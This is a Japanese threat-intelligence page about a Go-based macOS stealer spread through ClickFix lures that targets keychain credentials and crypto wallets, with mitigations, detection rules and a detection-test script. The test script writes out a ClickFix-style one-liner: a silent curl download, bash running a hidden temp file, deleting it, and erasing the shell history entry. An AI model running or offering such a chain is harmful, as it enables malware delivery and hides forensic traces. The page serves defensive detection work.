macOS用情報窃取マルウェアが暗号通貨ウォレットを標的に
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
GoベースのmacOSスティーラーがクリックフィクスのソーシャルエンジニアリングキャンペーンを通じて暗号通貨ユーザーを狙っています。このマルウェアは、Appleキーチェーンとブラウザストアから機密認証情報を盗み取るだけでなく、被害者のウォレットから徐々に暗号通貨の残高を失わせる能力を備えています。感染チェーンは、アーキテクチャ固有のMach-Oペイロードを配信するシェルスクリプトプロファイラーから始まります。
調査
Huntressのアナリストは、回顧的なハント中に脅威を発見し、約3か月間活動していたmacOS特有のスティーラーの構成要素を特定しました。調査では、支援インフラストラクチャが、制裁を受けたロシアの耐弾道ホスティングプロバイダーであるAeza Groupと関連していることが判明しました。研究者は、初期のClickFixのソーシャルエンジニアリングのプロンプトから最終ペイロード実行やC2通信までの攻撃チェーンを再構築しました。
緩和策
ユーザーは、疑わしいCAPTCHAプロンプトとやり取りしたり、Terminalにコマンドを入力することを求める異常な指示に従ったりすることを避けるべきです。NoScriptのような悪意あるスクリプトを制限するためのブラウザ拡張機能や、Pi-holeのようなDNSベースのブロッキングツールが、露出を抑えるのに役立ちます。ClickFixのソーシャルエンジニアリングに焦点を当てた包括的なユーザー啓蒙トレーニングは、最も効果的な防御の一つです。
対応
感染が検出された場合、データのさらなる流出や暗号通貨ウォレットの枯渇を防ぐため、影響を受けたmacOSシステムを直ちに隔離すべきです。管理者は、すべての悪意あるMach-Oバイナリおよび関連する持続メカニズムを見つけて削除する必要があります。このマルウェアは認証情報を狙うため、侵害されたデバイスからアクセスされたすべてのアカウントのパスワードをリセットする必要があります。
攻撃の流れ
検出
非標準パスからのlaunchctlブートストラップ(via process_creation)
Proof of Value
System_profiler列挙の試みの可能性(via process_creation)
Proof of Value
疑わしいCurl実行の試み[MacOS](via cmdline)
Proof of Value
検出すべきIOC(HashSha256):暗号通貨を狙うmacOSマルウェア
Proof of Value
検出すべきIOC(SourceIP):暗号通貨を狙うmacOSマルウェア
Proof of Value
検出すべきIOC(DestinationIP):暗号通貨を狙うmacOSマルウェア
Proof of Value
macOSマルウェア持続性および実行手法の検出[Linuxファイルイベント]
Proof of Value
暗号通貨を狙うmacOSマルウェアの攻撃[Linuxプロセス作成]
Proof of Value
シミュレーション実行
前提条件:テレメトリ&ベースラインプリフライトチェックが合格している必要があります。
理由:このセクションでは、検出ルールをトリガーするように設計された正確な敵対者の技術(TTP)を詳述しています。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。抽象的または無関係な例は誤診に繋がります。
-
攻撃の概要&コマンド: 敵対者はクリックフィックス詐欺を開始します。被害者はターミナルでコマンドを実行するように騙されます。コマンドは、
curl -kFsSLを使用して、悪意のあるスクリプトを静かにダウンロードします。足跡を残さないように、スクリプトは自分自身の一時ファイルを即座に削除するbashのワンライナーで実行されます(.UlaccK)。最後に攻撃者は、ユーザーのシェル履歴からコマンドを注意深く削除するための複雑なhistoryコマンドを実行し、カジュアルなフォレンジック検査で攻撃を不可視にします。 -
リグレッションテストスクリプト:
#!/bin/bash # ClickFix macOSマルウェア攻撃のシミュレーション # このスクリプトは検出ルールに必要な正確な文字列パターンを模倣します。 echo "[+] シミュレーション開始..." # 1. curlダウンロードをシミュレート(選択3) # 2. bash実行と即時削除をシミュレート(選択1) # 3. 履歴操作をシミュレート(選択2) # これらを1行にまとめて行動パターンを模倣します # 注意:実際のマルウェア実行を避けるためにダミーURLを使用しています curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] シミュレーションコマンド実行済み。" echo "[!] SIEMで'暗号通貨を狙うmacOSマルウェア攻撃'アラートを確認してください。" -
クリーンアップコマンド:
# シミュレーションによって残された痕跡を削除 rm -f .UlaccK # 注意:スクリプト内の履歴操作は回避策をシミュレートするためであり、 # テストユーザーのための手動履歴復元が必要となる可能性があります。